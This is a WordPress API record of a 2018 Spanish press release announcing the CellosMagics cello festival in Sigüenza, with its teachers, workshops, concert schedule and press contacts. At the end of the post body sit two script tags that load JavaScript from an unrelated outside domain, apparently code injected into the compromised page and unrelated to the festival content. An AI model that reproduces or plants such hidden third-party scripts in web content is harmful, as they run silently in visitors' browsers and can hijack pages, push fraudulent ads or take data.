{"id":232,"date":"2018-07-26T11:13:06","date_gmt":"2018-07-26T11:13:06","guid":{"rendered":"http:\/\/www.bandopress.com\/notas-de-prensa\/?p=232"},"modified":"2018-07-26T11:13:06","modified_gmt":"2018-07-26T11:13:06","slug":"siguenza-vuelve-a-llenarse-de-violonchelos-en-el-final-de-julio","status":"publish","type":"post","link":"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/26\/siguenza-vuelve-a-llenarse-de-violonchelos-en-el-final-de-julio\/","title":{"rendered":"Sig\u00fcenza vuelve a llenarse de violonchelos en el final de julio"},"content":{"rendered":"<p><strong>En la V Edici\u00f3n, tercera que se celebra en la ciudad del Doncel de CellosMagics, un festival que adem\u00e1s de impartir lecciones magistrales para alumnos de este instrumento venidos de todo el mundo, tambi\u00e9n acerca la m\u00fasica del chelo a las calles de la ciudad<\/strong><\/p>\n<p>Como en los tres \u00faltimos a\u00f1os, a lo largo de esta semana, la \u00faltima del mes de julio, la ciudad del Doncel, y sus monumentos, se van a ver realzados por la m\u00fasica de los violonchelos, que llegan a la ciudad de la mano del festival anual CellosMagics.<\/p>\n<p>De domingo a s\u00e1bado se suceder\u00e1n clases, conciertos y talleres en los que participar\u00e1n alumnos, m\u00e1s de cincuenta venidos de toda Espa\u00f1a y tambi\u00e9n de diferentes pa\u00edses del mundo como China, Turqu\u00eda, Estados Unidos o Alemania- y profesores. Adem\u00e1s, y debido a su \u00e9xito, CellosMagics se ha extendido este a\u00f1o a j\u00f3venes alumnos de entre ocho y doce a\u00f1os, en su versi\u00f3n Junior.<\/p>\n<p>Hay programados seis conciertos, todos con entrada libre, entre hoy domingo, y el pr\u00f3ximo s\u00e1bado, 28 de julio. Se suceder\u00e1n en diferentes escenarios de la ciudad (ver propuesta). Pero, adem\u00e1s, cada a\u00f1o, \u00ablos propios alumnos tambi\u00e9n eligen tocar, en formaciones de c\u00e1mara, en diferentes escenarios de la ciudad, en plena calle\u00bb, afirma Manuel Santapau, uno de los profesores y portavoces de la iniciativa.<\/p>\n<p>El primero de ellos ha tenido lugar ya hoy, en el Claustro del Convento de las Doroteas, cuartel general de CellosMagics. Lo presentaba Sonsoles Arcones, concejala de Cultura del Ayuntamiento de Sig\u00fcenza, que dio la bienvenida a la iniciativa e invit\u00f3 a disfrutar a seguntinos y visitantes de la magia de la m\u00fasica melanc\u00f3lica de este instrumento en la ciudad. Arcones destaca que la combinaci\u00f3n entre la fuerza y el entusiasmo de los estudiantes, y la sabidur\u00eda de sus profesores \u00abnos va a deparar conciertos memorables, como ya sucediera en los dos a\u00f1os anteriores\u00bb.<\/p>\n<p>El elenco de profesores lo componen magn\u00edficos docentes y chelistas, como Jos\u00e9 Enrique Bouch\u00e9, Manuel Santapau, Gy\u00f6rgy D\u00e9ri, Sergi Boadella, Pietro Serafin y Chu Yi-Bing, profesor invitado, y en la modalidad Junior los docentes Lydia Asensi, Nuria Gonz\u00e1lez y Alberto Mu\u00f1oz, a quienes se une, al piano, Francesc Estelles.<\/p>\n<p>A largo de esta semana, los alumnos recibir\u00e1n clases individuales y de grupo, y participaran en talleres monogr\u00e1ficos, como el que CellosMagics va a dedicar a la Gyrokinesis, que trata sobre el desequilibrio entre el conocimiento de la t\u00e9cnica violoncell\u00edstica y el cuidado del cuerpo. Otro se dedicar\u00e1 a profundizar en las Suites para violoncello solo de Bach, en la que se analizar\u00e1 el estilo, la forma y la interpretaci\u00f3n de estas obras de manera te\u00f3rico-pr\u00e1ctica de la mano de un experto y estudioso de la materia como es Sergi Boadella. Y aun otro m\u00e1s tratar\u00e1 sobre &#8216;El cello en el flamenco&#8217;. Dar\u00e1 a conocer y mostrar\u00e1 las caracter\u00edsticas fundamentales del lenguaje as\u00ed como los recursos t\u00e9cnicos necesarios para la interpretaci\u00f3n del flamenco con el cello. Estos talleres, salvo las clases propiamente dichas, est\u00e1n abiertos al p\u00fablico. El Ayuntamiento de Sig\u00fcenza y Bell\u00b4Arte Europa son dos de los patrocinadores de la iniciativa.<\/p>\n<p><strong>Conciertos<\/strong><br \/>\nConcierto de apertura<br \/>\nSergi Boadella, cello<br \/>\nObras de Bach y Cassad\u00f3<br \/>\nDomingo 22 de Julio I 19.30h<br \/>\nClaustro del Convento de las Doroteas<\/p>\n<p>Taller\/Concierto &#8211; El cello en el flamenco<br \/>\nJose Luis L\u00f3pez, violoncello<br \/>\nPablo Su\u00e1rez, piano<br \/>\nLunes 23 de Julio I 19.00h<br \/>\nAuditorio &#8216;El P\u00f3sito&#8217;<\/p>\n<p>Velada con Bach<br \/>\nAlumnos de CellosMagics2018<br \/>\nMartes 24 de Julio I 22.00h<br \/>\nPatio interior del Ayuntamiento<\/p>\n<p>Concierto de profesores<br \/>\nProfesores de CellosMagics2018<br \/>\nObras de Villalobos, Zanettovich y Popper<br \/>\nJueves 26 de Julio I 19.00h<br \/>\nAuditorio &#8216;El P\u00f3sito&#8217;<\/p>\n<p>Recital violoncello y piano<br \/>\nAlumnos de CellosMagics2018<br \/>\nFrancesc Estell\u00e9s, piano<br \/>\nViernes 27 de Julio I 19.00h<br \/>\nAuditorio &#8216;El P\u00f3sito&#8217;<\/p>\n<p>Concierto de Clausura<br \/>\nS\u00e1bado 28 de Julio I 20.30h<br \/>\nAuditorio &#8216;El P\u00f3sito&#8217;<br \/>\nGrupos de c\u00e1mara y Orquesta CellosMagics2018<\/p>\n<p>M\u00e1s informaci\u00f3n:<br \/>\nAyuntamiento de Sig\u00fcenza. Prensa. 949 390 850<br \/>\nGabinete de Prensa. Javier Bravo. 606 411 053<\/p>\n<p><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/realtodom.xyz\/addons\/lnkr30_nt.min.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"mh-excerpt\"><p>En la V Edici\u00f3n, tercera que se celebra en la ciudad del Doncel de CellosMagics, un festival que adem\u00e1s de impartir lecciones magistrales para alumnos <a class=\"mh-excerpt-more\" href=\"http:\/\/www.bandopress.com\/notas-de-prensa\/2018\/07\/26\/siguenza-vuelve-a-llenarse-de-violonchelos-en-el-final-de-julio\/\" title=\"Sig\u00fcenza vuelve a llenarse de violonchelos en el final de julio\">[&#8230;]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":233,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-232","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-castilla-la-mancha"],"_links":{"self":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/comments?post=232"}],"version-history":[{"count":1,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/232\/revisions"}],"predecessor-version":[{"id":234,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/posts\/232\/revisions\/234"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media\/233"}],"wp:attachment":[{"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/media?parent=232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/categories?post=232"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.bandopress.com\/notas-de-prensa\/wp-json\/wp\/v2\/tags?post=232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}